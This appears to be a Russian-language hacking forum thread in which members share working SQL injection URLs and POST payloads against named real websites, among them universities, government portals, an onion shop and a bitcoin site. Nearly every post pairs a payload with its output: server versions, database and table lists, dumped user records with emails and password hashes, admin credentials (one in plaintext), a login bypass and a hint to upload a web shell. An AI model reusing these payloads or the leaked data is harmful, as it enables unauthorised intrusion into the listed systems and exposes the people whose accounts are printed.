Постим сюда найденные SQL инъекции. Прежде, чем запостить, проверьте, не выкладывалась ли SQLi ранее:


Code:
Google: site:forum.antichat.ru [ваш сайт с SQLi]

Предыдущая тема: /threads/21336/ (https://antichat.live/threads/21336/)

ВНИМАНИЕ !!! Все инъекции заключаем в тег [ CODE ] [ / CODE ], ни каких [ URL ] [ / URL ] быть не должно.

Правила этой темы:


Инъекции вида:


Code:
http://site.ru/index.php?a='

будут удаляться. Также желательно в посте указывать версию БД.

В теме запрещается публиковать пароли и хеши к админкам. Они будут удаляться, а нарушители - наказываться.

Флейм/оффтоп удаляется и жестко наказывается.

Скуля с выводом в адресной строке


Code:
http://www.mmlf.ru/?go=members&sid=29%27+and+0+union+select+1,2,3,4,5,6,version() ,8,9,10,11,12,13--+k

5.5.36-34.0-632.precise

Code:
http://machouse.ua/solutions/s2/pre-press/sys_ctp/treatment_digital_pl/g-j-raptor--85-polymer-cou-dlja-fotopolimernykh-plactin"and(select 1 from(select count(*),concat((select user() from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and".html

(1062) Duplicate entry 'macnew@127.0.0.11' for key 'group_key'

Code:
http://infoeco.ru/ecomobile/index.php?id=34&datePointId=-6755 union select 1,2,3,4,5,6,concat(user(),0x3a,database()),8,9,10, 11,12,13,14--

ecomobil@localhost:ecomobil

Code:
http://landscrona.ru/media/index.php?id=-2825%20union%20select%201,2,3,user%28%29,version%2 8%29,database%28%29,7,8,9,10,11,12,13,14,15--

crona_site 5.5.25 db_crona@localhost

Code:
http://dzz.gov.ua/CPOSI/style/page_2/templer_page2_ru.php?id=21%20union%20select%201,2, 3,concat%28user%28%29,0x3c62723e,version%28%29,0x3 c62723e,database%28%29%29,5,%27fox%20tech%27,7,8--&table=info

znvc@localhost

5.1.73

CPOSI


Code:
http://khersonryboohorona.gov.ua/newscomdet.php?id=5&mod=-393%20union%20select%201,2,concat%28user%28%29,0x3 c62723e,version%28%29,0x3c62723e,database%28%29%29 ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--&lang=



ruboohran_riba@192.168.1.28

5.5.27-log

ruboohran_riba

Code:
http://www.satena.com/about-us/board-of-directors/(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117) ,CHAR(75),CHAR(80),CHAR(112),CHAR(53),CHAR(111),CH AR(89),CHAR(89),CHAR(81)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))

Code:
http://www.astera.ru/it-top/?type=-2'+union+select+1,2,3,4,5,0x456e6a6f7921,7,8,9+--+&year=2015&month=2

Будьте внимательны, MySQL 4

Code:
invest-expert.info/articles.php?article_id=-130'+union+select+(version()),2,3--+

in TITLE

8k hosts/day

кому интересно повоевать с waf... хотя faza ужо замочил...


Code:
http://www.mkap.ru/newsview.php?id=1475+and+1=1

CY 250, PR 4

fakecoder said:
↑ (https://antichat.live/posts/3847057/)
кому интересно повоевать с waf

Code:
http://www.mkap.ru/newsview.php?id=1475+and+1=1

CY 250, PR 4


посты лучше склеить


Code:
http://www.mkap.ru/newsview.php?id=-1475+/*!12345union*//*!12345%73%65%6c%65%63%74*/version(),2,3,4--+

5.0.77-log

fakecoder said:
↑ (https://antichat.live/posts/3847052/)

Code:
invest-expert.info/articles.php?article_id=-130'+union+select+(version()),2,3--+

in TITLE
8k hosts/day


ничего интересного

База:

invest-expert

Таблицы:

table_article

table_banner

table_coment

table_fotos

table_kategorie

table_menue

table_news

table_produkt

table_projects

table_projects_archive

table_text_blocks

table_texte

table_video

Code:
http://frameworksgallery.com/admin/checkuser.php
POST
member_name=k&password=kkkkkk' or 1=1 -- &Submit=Submit

шелл phtml лить, если что

Code:
http://www.lampbulbs.co.uk/product.php
?prodid=162' +UNION(/**_**/SELECT(1),(2),(concat/**_**/((0x3c62723e),(0x7e7e4d69737465725f42657274306e697 e7e),(
0x3c62723e),(version/**_**/()),(0x3c62723e),(user/**_**/()),(0x3c62723e),(database/**_**/()))),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13), (14),(15),(16),(17),(18),(19),(20),(21),(22),(23), (24),(25),(26),(27),(28),(29),(30),(31),(32),(33), (34),(35),(36),(37),(38),(39),(40),(41),(42))--+

HTML:
http://www.ghanaweb.com/GhanaHomePage/soccer.PredictionLeague/index.php?cmd=showmonthlywinners&month=24121'+and+1=0+union+select+1,2,3,4,@@versio n,6,7,8,9,10,11,12,13,14,user(),16,17,18,19,20,21, 22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 ,39,40,41+--+

user() =rijk5_w@209.68.59.161

@@version = 5.1.67-log

Alexa = 2,645

Code:
http://www.uvm.edu/crs/sdc/county_result.php?co_id=4'+and+extractvalue(1,conc at(0x3a,(user())))+--+

user()=rural_admin@tubeweb1.uvm.edu (mailto:rural_admin@tubeweb1.uvm.edu)

version() =5.5.43-37.2-log

Alexa = 15,582 (https://antichat.live/chrome-extension_/mndgegloobmkfgpjhanblmddcjgnfcga/popup.html/)


Code:
http://depts.washington.edu/neurolog/psych/archives/viewPres.php?id=708'and+extractvalue(1,concat(0x3a ,(user())))+--+

user() = root@depts12.u.washington.edu (mailto:root@depts12.u.washington.edu)

version() = 5.5.18

http://www.sangean.com/image/LOGO/SANGEAN_LOGO_RED.gif


sangean.com/products/product.asp?mid=40%20or%201=@@version


ТИЦ20 PR4 AR460,627

ПР7


Code:
http://www.stevens.edu/provost/oie/view-patent?id=-20100137884+union+select+1,2,3,4,5,6,7,version(),9 ,10,11,12+--+

друпал


Code:
https://www.stevens.edu/provost/CHANGELOG.txt

как узнать префикс бд?

нет префикса же


Code:
http://www.stevens.edu/provost/oie/view-patent?id=-20100137884+union+select+1,2,3,4,5,6,7,table_name, 9,10,11,12+from+information_schema.tables+where+ta ble_schema=database()+--+

Code:
http://www.winelabelworld.com/list.php?c=18&w=8+OR+(SELECT+COUNT(*)+FROM+(SELECT+1+UNION+SELEC T+2+UNION+SELECT+3)x+GROUP+BY+CONCAT(MID(VERSION() ,+1,+63),+FLOOR(RAND(0)*2)))+--+

Query failed: Duplicate entry '5.0.951' for key 1

У сайта localwineevents.com, база "lwe". Которая находится рядом / alexa 163,137

Code:
http://education.zyxel.com/ZCNE_Course_Event.asp?cert_id=1' or 1=@@version--

Windows version: 2003

SQL Server version: 2005

Database name: education_3

System user: cso_user

Server name: CSO-ELDB

Выжимал "максимум" с error based )) от потенциальной уязвимости до начала дампа за ~5 запросов))


Code:
URL: http://2c5whdbcb6m2c2xx.onion/search/1%27%29%09and%09%28%28SELECT%09%28i%09IS%09NOT%09N ULL%29%09-%09-9223372036854775808%09FROM%09%28SELECT%09%28concat %28version%28%29%29%29i%29a%29%29=2--%09

version() = 5.5.43-0+deb7u1


Code:
URL: http://2c5whdbcb6m2c2xx.onion/add_to_cart
POSTDATA: quant=1&id=(188)or(SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (concat(0x7b7b7b,((select length((SELECT MID(CONCAT(@:=0x20,(SELECT COUNT(*) FROM information_schema.tables WHERE table_schema!="information_schema" and @:=CONCAT(@,0x2C,CONCAT(table_name))),@),5))))),0x 3a,substr(@,1,400),0x7d7d7d))i)a)&url=%2Fproducts%2F7



Code:
URL: http://2c5whdbcb6m2c2xx.onion/add_to_cart
POSTDATA: quant=1&id=(188)or(SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (concat(0x7b7b7b,((select length((SELECT MID(CONCAT(@:=0x20,(SELECT COUNT(*) FROM information_schema.tables WHERE table_schema!="information_schema" and @:=CONCAT(@,0x2C,CONCAT(table_name))),@),5))))),0x 3a,substr(@,300,700),0x7d7d7d))i)a)&url=%2Fproducts%2F7


Результат(имена таблиц в hoursppc_biznewenc):


Code:
addressbook
allorg_orders
best5
blog_commentmeta
blog_comments
blog_links
blog_options
blog_postmeta
blog_posts
blog_term_relationships
blog_term_taxonomy
blog_terms
blog_usermeta
blog_users
bonus_types
bonuses
categories
cats_of_groups
contacts_block
countries
coupons
currancies
domains
domains2
emails
fake_products
global
groups
images
langs
login
messages
news
old_orders
old_users
old_users2orders
order_discounts
order_items
order_statuses
orders
org_orders
pages
payments
pro_orders
products
real2fake
serialize_data
settings
shippings
single
states
storages
texts
ticket_action
ticket_notify
ticket_settings
ticket_ticket
ticket_ticket_bak
ticket_user
users
users2orders
users_anabol
warns



Code:
URL: http://2c5whdbcb6m2c2xx.onion/add_to_cart
POSTDATA: quant=1&id=(188)or(SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (concat(0x7b7b7b,(SELECT MID(CONCAT(@:=0x20,(SELECT COUNT(*) FROM information_schema.columns WHERE table_name='users' and @:=CONCAT(@,0x2C,CONCAT(column_name))),@),5)),0x7d 7d7d))i)a)&url=%2Fproducts%2F7

Результат(имена колонок в hoursppc_biznewenc.users):


Code:
id
login
password
name
address
city
zip
country
state
email
phone
discount
added
lastvisit
status
canUpgrade
comments
is_active
md5Password
old_orders_count
old_orders_numbers
terms
active
history
refer



Code:
URL: http://2c5whdbcb6m2c2xx.onion/add_to_cart
POST DATA: quant=1&id=(188)or(SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (concat(0x7b7b7b,(select length(MID(CONCAT(@:=0x20,(SELECT COUNT(*) FROM users WHERE @:=CONCAT(@,0x2C,CONCAT(login,0x3b,email,0x3b,pass word))),@),5))),0x3a,(SELECT mid(@,1,400)),0x7d7d7d))i)a)&url=%2Fproducts%2F7


Результат (обрывок от select concat(login,0x3b,email,0x3b,password) from hoursppc_biznewenc.users):


Code:
Neval;chuvyrlo@gmail.com;da3f50400551551ea03382ac7 c3bfa587f789b68
tjoxvic;tjoxvic@gmail.com;da3f50400551551ea03382ac 7c3bfa587f789b68
daniel middleton;daniel.middleton@afg.usmc.mil;da3f504005 51551ea03382ac7c3bfa587f789b68
baddscorp;baddscorp@aol.com;da3f50400551551ea03382 ac7c3bfa587f789b68
luga888;luga888@live.com;da3f50400551551ea03382ac7 c3bfa587f789b68
mike6484;mike7542@comcast.net;da3f50400551

Code:
http://forums.sbo.sailboatowners.com/q_login.php?do=login

POST

.SpoilerTarget" type="button">Spoiler: POST
redirect=http%3A%2F%2Fsbo.sailboatowners.com%2Find ex.php%3Foption%3Dcom_content%26task%3Dview%26id%3 D30%26Itemid%3D64&vb_login_username=asfasf'or(ExtractValue(1,concat( 0x3a,(select+user()))))='1&vb_login_password=asfasf&cookieuser=1&image.x=0&image.y=0&s=&do=login&vb_login_md5password=0a040ec34abbfb7f3030345244a91 3c9&vb_login_md5password_utf=0a040ec34abbfb7f303034524 4a913c9

Интегрированый вб в жумлу, везде попрятаны админки и т.п, но все ищется и льется . Мб кому интересно будет попробовать

Code:
https://blogs.adobe.com/adobelife/photos/?gid=-1+/*!uNIoN*/+(/*!SelEcT*/+1,1,1,concat(0x3a3a3a3a3a,database(),0x3a3a3a3a3a )+)+--+;

wp стоит

КАМЧАТСКИЙ НАУЧНЫЙ ЦЕНТР​


Code:
http://www.kscnet.ru/ivs/kvert/volc.php?lang=en&name=99999'+union+select+1,2,3,4,5,6,7,8,9,10,11,1 2,concat_ws(0x3a,version(),database(),user(),@@ver sion_compile_os),14,15,16,17,18,19,20+--+

тиц 750 пр 5

5.5.30-log

SQLi:


Code:
http://boroughs.org/subpage.php?link=Borough-News-Magazine'+AND+1=0+UNION+ALL+SELECT+1,2,3,4,5,conca t_ws(0x3b3c62723e,database(),user(),version(),@@ve rsion_compile_os),7,8,9,10,11+--+

http://sanpid.com/images/logo_vs.png


Code:
http://sanpid.com/index.php?page=1&cid=220&pid=-371+union+Select+version%28%29+--+

Версия: 5.0.96-community-log

SQLi:


Code:
http://www.rnd.goa.gov.in/content_news_disp.php?id=-14+union+select+1,2,3,4,CONCAT_WS%280x3b3c62723e,u ser%28%29,version%28%29,database%28%29,@@version_c ompile_os%29,6,7,8,9,10,11+--+

rnd@localhost; 5.6.22; rnd

Code:
http://pr.alexa.cn/index.php?url=1' OR EXTRACTVALUE(8396,CONCAT(0x5c,0x716a787171,(SELECT (ELT(8396=8396,1))),0x7171787671)) AND 'BvUT'='BvUT

alexa.cn трафф 590к

error-based

hostname: 'AY12063001214105c7538'

'root'@'127.0.0.1'

Nginx, PHP 5.4.37, MySQL >= 5.0.0

BD list:

alexa

icpdb

information_schema

mysql

performance_schema

test

tour2013

whoisdb

xj_cn_2014

Code:
http://leton.tv/player.php?streampage=tnj1bde' AND (SELECT 4549 FROM(SELECT COUNT(*),CONCAT(0x716a717671,(SELECT (ELT(4549=4549,1))),0x716a6b7871,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Iimq'='Iimq&width=600&height=450

leton.tv трафф 1.6kk сервис стримингово видео

error based

PHP 5.3.3, Nginx, MySQL >= 5.0.0

DBA: True

hostname: 'hostname.change.me'

''@'hostname.change.me'

''@'localhost'

'root'@'127.0.0.1'

'root'@'hostname.change.me'

'root'@'localhost'

DB list:

information_schema

megom

mysql

scorenews

test

wowza

wowza2

wowza2_b1

cashbackmonitor.comтрафф 430ксравнение шопов


Code:
Parameter: #1* (URI)
AND boolean-based blind - WHERE or HAVING clause
Payload: http://www.cashbackmonitor.com/Cashback-Comparison/1/?sub=g' AND 2703=2703 AND 'nUyh'='nUyh

Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://www.cashbackmonitor.com/Cashback-Comparison/1/?sub=g' AND (SELECT 2579 FROM(SELECT COUNT(*),CONCAT(0x716a627671,(SELECT (ELT(2579=2579,1))),0x7178787071,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'hlmZ'='hlmZ

Title: Generic UNION query (NULL) - 22 columns
Payload: http://www.cashbackmonitor.com/Cashback-Comparison/1/?sub=g' UNION ALL SELECT NULL,CONCAT(0x716a627671,0x4647646f4f536d657563,0x 7178787071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NUL L,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NUL L,NULL,NULL--


web server operating system: Linux Red Hat Enterprise 6 (Santiago)

web application technology: PHP 5.3.3, Apache 2.2.15

back-end DBMS: MySQL >= 5.0.0

available databases [3]:

CashbackMonitor

information_schema

test

-------------------------------------------------------------

sydney.edu.au трафф 2.2kк


Code:
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://sydney.edu.au:80/medicine/public-health/research/publications.php?year=2010' AND (SELECT 5421 FROM(SELECT COUNT(*),CONCAT(0x716a6a7871,(SELECT (ELT(5421=5421,1))),0x716a7a6a71,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'sBCP'='sBCP


web server operating system: Linux Red Hat Enterprise 5 (Tikanga)

web application technology: Apache 2.2.3, PHP 5.1.6

back-end DBMS: MySQL >= 5.0.0

available databases [266]:


Code:
acaorn
acaorn_wikidb
adri
anzacdb
appan
brainprofiling
cancer_sphider
cancerlearning
cancerlearning_tw
cards
cera
cl_resources
cl_surveys
cl_tw
clphpbb
ctc
ctctest
database
drh
elgg
emergency
eventsdb_dent
ex_allprofiles
ex_bdent
ex_bmri
ex_boh
ex_bond
ex_bond-post-upgrade
ex_bond_2005dev
ex_bond_after_upgrade
ex_bond_stage3-4
ex_bond_stage3_4
ex_bosch
ex_boschtest
ex_cirus
ex_cmsapitest
ex_cmsapitestreprox
ex_ctc
ex_dentistry
ex_devhealth
ex_global_health
ex_health
ex_kolling
ex_kollingfoundation
ex_medsci
ex_ncsc
ex_pharmacology
ex_pharmacy
ex_pharmold
ex_physiology
ex_proxyacaorn
ex_proxyaddiction
ex_proxyalumni
ex_proxyanatomy
ex_proxyapnet
ex_proxybmri
ex_proxybosch
ex_proxybsim
ex_proxycancerresearch
ex_proxycentral
ex_proxychw
ex_proxyconcord
ex_proxycoo
ex_proxycoppleson
ex_proxycpah
ex_proxydiabetes
ex_proxydrh
ex_proxyeye
ex_proxyfmrc
ex_proxyforensic
ex_proxygeneralpractice
ex_proxygenetic
ex_proxyglobalhealth
ex_proxyhealth
ex_proxyhocmai
ex_proxyimaging
ex_proxymeddiscipline
ex_proxymedfac
ex_proxymedfacfull
ex_proxymedfound
ex_proxymedicalfoundation
ex_proxymedicalhumanities
ex_proxymedsci
ex_proxymuseumtest
ex_proxynepean
ex_proxynmrf
ex_proxynorthern
ex_proxynrf
ex_proxyobsgynneo
ex_proxyome
ex_proxyopme
ex_proxypathology
ex_proxypharmacology
ex_proxyphysiology
ex_proxypmri
ex_proxypoche
ex_proxyprofiles
ex_proxyproteomics
ex_proxypsych
ex_proxyresearchteams
ex_proxyrural
ex_proxyseib
ex_proxystirc
ex_proxysurgery
ex_proxyvelim
ex_proxyvideoconf
ex_proxywestern
ex_proxywestmead
fhbc
ht_-v
ht_acaorn
ht_acaorntest
ht_addiction
ht_addictiontest
ht_agingbonetest
ht_anaes
ht_anatomytest
ht_apnet
ht_apnettest
ht_avit
ht_avittest
ht_bdent
ht_bmri
ht_bmritest
ht_bosch
ht_bosch_old
ht_bsim
ht_bsimtest
ht_cancerlearning
ht_cancerresearch
ht_cancerresearchtest
ht_central
ht_centraltest
ht_cochrane-renal
ht_concord
ht_concordtest
ht_cootest
ht_coppleson
ht_cpahtest
ht_ctc
ht_dentistry
ht_dentistrytest
ht_dermatology
ht_dermatologytest
ht_drh
ht_drhtest
ht_exambank
ht_forensic
ht_forensictest
ht_genetic
ht_genetictest
ht_globalhealthtest
ht_gmp
ht_gp
ht_gptest
ht_health
ht_healthbook
ht_healthbooktest
ht_healthtest
ht_hocmai
ht_hocmaitest
ht_imagingtest
ht_jira
ht_jmo
ht_kidsresearch
ht_kidsresearchtest
ht_kolling
ht_kollingtest
ht_localhost
ht_medfac
ht_medfactest
ht_medicalfoundation
ht_medicalfoundationtest
ht_medicalhumanities
ht_medicalhumanitiestest
ht_medicine
ht_medicinetest
ht_medsci
ht_medscitest
ht_mga
ht_mgatest
ht_nbrc
ht_nbrctest
ht_ncirs
ht_ncirstest
ht_ncsc
ht_nepean
ht_nepeantest
ht_neurologicalsigns
ht_northern
ht_northerntest
ht_nrf
ht_nrftest
ht_obsgynneo
ht_obsgynneotest
ht_ome
ht_ometest
ht_opme
ht_opmetest
ht_ovarian
ht_paediatrics
ht_paediatricstest
ht_pathologytest
ht_pharmacologytest
ht_physiology
ht_physiologytest
ht_poche
ht_pochetest
ht_psych
ht_psychtest
ht_pubhealth
ht_rural
ht_ruraltest
ht_scssc
ht_scssctest
ht_smokecheck
ht_smokechecktest
ht_stirc
ht_stirctest
ht_surgery
ht_surgerytest
ht_velim
ht_velimtest
ht_western
ht_westerntest
htcheck
infdisimmunologytest
information_schema
kolling
kollingaccess
kollinglive
limesurvey
limesurvey2
medicaldeanstestwp
medicaldeanswp
medsoc
moodle
moodle_cancer
mysql
nbcc
neurosigns
nmrf
orsee
pathologytest
pgau
phpesp
pmri
pmritest
proceduresmanual
publichealth
rehab
simrob_obs
ss
surgsoc
test
vmaillogin
wikibmri
wikicompass
wikidb
wikidevteam
wikifacmuseumtest
wikimedadminpedia
wikimediabank
wikiorrtmanual
wikioverseascahpedia
wpmysql

Code:
https://www.tcd.ie/irishfilm/print.php?search=keyword&q=radharc&exactMatch=&extraSearch=-8628 OR 1 GROUP BY CONCAT(0x716b716271,(SELECT (CASE WHEN (2226=2226) THEN 1 ELSE 0 END)),0x7170787871,FLOOR(RAND(0)*2)) HAVING MIN(0)#

tcd.ie трафф 1.2kk колледж Ирландии

error based

Apache 2.4.10;MySQL >= 5.0.0

Database: filmresearch_db

[6 tables]

+-----------------+

| bibliography |

| biography |

| censor_appeal |

| censor_decision |

| censor_film |

| film |

+-----------------+


Code:
http://bgequipment.powweb.com:80/service_detail.php?ID=1' AND (SELECT 1856 FROM(SELECT COUNT(*),CONCAT(0x716b767171,(SELECT (ELT(1856=1856,1))),0x7176716b71,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GkPg'='GkPg

powweb.com трафф разный

error based

PHP 5.3.29, Apache 2;MySQL >= 5.0.0

available databases [2]:

bges

information_schema

Code:
http://rid.waipadc.govt.nz/cemetery/cemetery_record_view.php?id=-2774+union+select+1,concat_ws%280x3c62723e,version %28%29,database%28%29,user%28%29%29,NULL,4,5,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21+--+

cemetery@aoraki.webbase.net.nz (mailto:cemetery@aoraki.webbase.net.nz);

5.0.51a-24+lenny5-log;

cemetery

Code:
http://www.polarview.aq/old/tablelisting_SAR.php?hemi=S&time=Last+week&area=NewZealand'+and+ascii(substr(version(),6,1))>'113'+and+concat(1,1,1)='111

Ничего интересного, просто "обычная" PostgreSQL инъекция на одном из сайтов Антарктиды. Проходите дальше.

ASP, MS-SQL

Тип атаки: Convert INT ODBC Error


Code:
Версия - http://nchla.org/issues.asp?ID=1+and+1=convert(int,@@version)--



Code:
Пользователь http://nchla.org/issues.asp?ID=1+and+1=convert(int,user_name())--



Code:
База данных http://nchla.org/issues.asp?ID=1+and+1=convert(int,db_name())--



Code:
Перебираем имена баз данных
http://nchla.org/issues.asp?ID=1+and+1=convert(int,DB_NAME(0))--
http://nchla.org/issues.asp?ID=1+and+1=convert(int,DB_NAME(1))--
http://nchla.org/issues.asp?ID=1+and+1=convert(int,DB_NAME(2))--
http://nchla.org/issues.asp?ID=1+and+1=convert(int,DB_NAME(3))--
http://nchla.org/issues.asp?ID=1+and+1=convert(int,DB_NAME(4))--
http://nchla.org/issues.asp?ID=1+and+1=convert(int,DB_NAME(5))--

Ну и дамп

http://i11.pixs.ru/storage/7/3/4/dumppng_3365831_17973734.png

PR7


Code:
http://www7.inra.fr/drh/cr2013/listeparconcours-cr2.php?choix=8&langue=FR+union+select+1,2,3,4,user(),6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25+--+

Code:
http://www.compactkitchens.in/productdetail.php?cat_id=.37' and @pipka:=(
(SELECT+GROUP_CONCAT(/*!12345table_name*/,0x2020203a3a3a2020,/*!12345column_name*/+SEPARATOR+0x3c62723e)+FROM+
/*!50000INFORMATION_SCHEMA.columns*/+WHERE+TABLE_SCHEMA=DATABASE/**/()))/*!50000UNIOn*/ SELECT 1,2,3,4,5,6,
concat/**/(0x3c7370616e207374796c653d22666f6e742d66616d696c7 93a4963656c616e643b636f6c6f723a7265643b73697a653a3 53b746578742d736861646f773a23303030203070782030707 820337078223e4d69737465725f42657274306e693c62723e,
0x4461746162617365203a3a202020,DATABASE/**/(),
0x3c62723e506f727420203a3a2020,@@PORT,
0x3c62723e46696c6573797374656d203a3a2020,@@VERSION _COMPILE_OS,0x20203a3a2020,
@@VERSION_COMPILE_MACHINE,
0x3c62723e56657273696f6e206f6620446174616261736520 3a3a2020,version/**/(),0xa3c62723e486f73746e616d65203a3a20,
@@HOSTNAME,
0x3c2f7370616e3e,@pipka),8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25-- -



Code:
http://www.ilovemusica.com/shop.php?cat=.6 UNION SELECT concat(0x3c2f7469746c653e,0x3c63656e7465723e,
0x3c7370616e207374796c653d22666f6e742d66616d696c79 3a4963656c616e643b636f6c6f723a7265643b73697a653a35 3b746578742d736861646f773a233030302030707820307078 20337078223e4d69737465725f42657274306e693c62723e,
0x4461746162617365203a3a202020,DATABASE(),
0x3c62723e506f727420203a3a2020,@@PORT,
0x3c62723e46696c6573797374656d203a3a2020,@@VERSION _COMPILE_OS,0x20203a3a2020,
@@VERSION_COMPILE_MACHINE,
0x3c62723e56657273696f6e206f6620446174616261736520 3a3a2020,version(),0xa3c62723e486f73746e616d65203a 3a20,
@@HOSTNAME,
0x3c2f7370616e3e,(select(@x)from(select(@x:=0x00), (@running_number:=0),(@tbl:=0x00),(select(0)from(i nformation_schema.columns)where(table_schema=datab ase())and(0x00)in(@x:=Concat(@x,0x3c62723e,if((@tb l!=table_name),Concat(0x3c2f6469763e,LPAD(@running _number:=@running_number%2b1,2,0x30),0x3a292020,0x 3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name, 0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c6469762 07374796c653d226d617267696e2d6c6566743a333070783b2 23e), 0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6 e7420636f6c6f723d626c75653e,column_name,0x3c2f666f 6e743e))))x),0x3c212d2d),null -- -

Еще...

Вывод в алерте


Code:
http://www.agriagency.com.ua/comments/10227.html'or(ExtractValue(1,concat(0x3a,(select(v ersion())))))='1

ВНИМАНИЕ !!! Все инъекции заключаем в тег [ CODE ] [ / CODE ], ни каких [ URL ] [ / URL ] быть не должно.​

Инъекции в POST выкладываем тоже в [ CODE ] [ /CODE ]


Code:
http://site.zone/index.php?cmd=viewpost
POST:
id=-1'+and+1=2+union+select+1,2,3,4,5,version(),7,8+--+


Текст в [ URL ] [ /URL ] урезается по длинне и становится не удобным для чтения, в отличии от [ CODE] [ /CODE ]

Code:
http://www.tv3.ie/news_sub_page.php?locID=1.2.888000+union+select+co ncat_ws(0x3a3a,version(),user(),database())--

Version: 5.0.95-log

user : tv3_readonly@localhost (mailto:tv3_readonly@localhost)

database: tv3

Привет все!

Дырка есть базу выдает но там joomla 3.3.1 хеш с солью высыпает

И фильтр не пропускает логин админа(((


Code:
http://orange-gorodok.ru/modules/mod_6contacts/helper.php?modId=1'

Там только перебор бессмысленный сразу инжектировать нужно

Я через софт Havij v1.16 скачал базу


Code:
Target: http://orange-gorodok.ru/modules/mod_6contacts/helper.php?modId=%Inject_Here%
Host IP: 91.236.136.194
Web Server: nginx
DB Server: MySQL error based
Resp. Time(avg): 85 ms
Sql Version: 5.5.43-0+deb7u1-log
Compile OS: debian-linux-gnu
Host Name: ura.webhost1.ru
Current DB: sergei62_og
Installation dir: /usr

данные админа

povar.admin@gmail.com (mailto:povar.admin@gmail.com)

$2y$10$C8P2iexVqWIKqMUmxhOpCeCTsx9MwInyzBOwShbI/VeDdR47XEvzO

Залить не получилось(( не нашел пути

Кто сможет раскопать отпишите в личку (Как удалось?)

P.S. на сервере фильтрация на количество запросов в минуту! Так что не спишите)))

goot said:
↑ (https://antichat.live/posts/3874382/)
Привет все!
Дырка есть базу выдает но там joomla 3.3.1 хеш с солью высыпает
И фильтр не пропускает логин админа(((

Code:
http://orange-gorodok.ru/modules/mod_6contacts/helper.php?modId=1'

Там только перебор бессмысленный сразу инжектировать нужно
Я через софт Havij v1.16 скачал базу

Code:
Target: http://orange-gorodok.ru/modules/mod_6contacts/helper.php?modId=%Inject_Here%
Host IP: 91.236.136.194
Web Server: nginx
DB Server: MySQL error based
Resp. Time(avg): 85 ms
Sql Version: 5.5.43-0+deb7u1-log
Compile OS: debian-linux-gnu
Host Name: ura.webhost1.ru
Current DB: sergei62_og
Installation dir: /usr

данные админа
povar.admin@gmail.com (mailto:povar.admin@gmail.com)
$2y$10$C8P2iexVqWIKqMUmxhOpCeCTsx9MwInyzBOwShbI/VeDdR47XEvzO
Залить не получилось(( не нашел пути
Кто сможет раскопать отпишите в личку (Как удалось?)
P.S. на сервере фильтрация на количество запросов в минуту! Так что не спишите)))



Хэш очень похож на OpenBSD Blowfish

Логин подозреваю будет Admin

Вот что удалось вытянуть,подозреваю уже кто-то залез в админку

coolxacer@list.ru (mailto:coolxacer@list.ru):$2y$10$C8P2iexVqWIKqMUm xhOpCeCTsx9MwInyzBOwShbI/VeDdR47XEvzO!

povar.admin@gmail.com (mailto:povar.admin@gmail.com):$2y$10$.qPZfqEzdniT 1gOnrmQGWeZ9ZRikV1ic4aFrCmRUCWFk4u9wVBkqC!

Вот что удалось найти по типу таких хэшей,ничего не понял ,но может кому пригодится http://habrahabr.ru/post/211645/


Code:
http://dir.rusmedserv.com/index.php?t=sub_pages&cat=-4+UNION+SELECT+1,2,user(),4,database(),6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20--

Ну и бонусВот интерестная inject. дальше не получатся залезть,если есть идеи в ПМ пож.

btc


Code:
Post[URL]: http://www.vitalcoin.com/order_ajax_request.php
Post[data]: Action=IsUserLogedIn&TransactionMode=2&TransactionType=PKR and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(Hex(cast(database() as char))),0x27,0x7e)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1



Code:
Warning: mysql_query(): Unable to save result set in /home/vitalcoi/public_html/models/order.php on line 88

Duplicate entry '~'vitalcoi_dbuser@localhost'~1' for key 'group_key'



Code:
Админка под Basic
UserID,UserName,Password=16^kitharass^56c87d0571ee 5a4da6793583164da8f4:kitharass@gmail.com
UserID,UserName,Password=14^admin^Vital!@#:faag786 @gmail.com
UserID,UserName,Password=15^maria^55913d077666fa9d 9b5a0a35c718ba38

Code:
www.meleeboys.com/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/concat(username,'
',password),222+from+jos_users--%20-
www.skala-club.vn.ua/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/concat(username,'
',password),222+from+jos_users--%20-
toxic.h5n1.free.fr/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/concat(username,'
',password),222+from+jos_users--%20-

Code:
http://casu.us/online_programs.php?id=-1+union+select+1,concat_ws(0x3a3a,version(),user() ,database()),3,4,5--

5.0.96-log

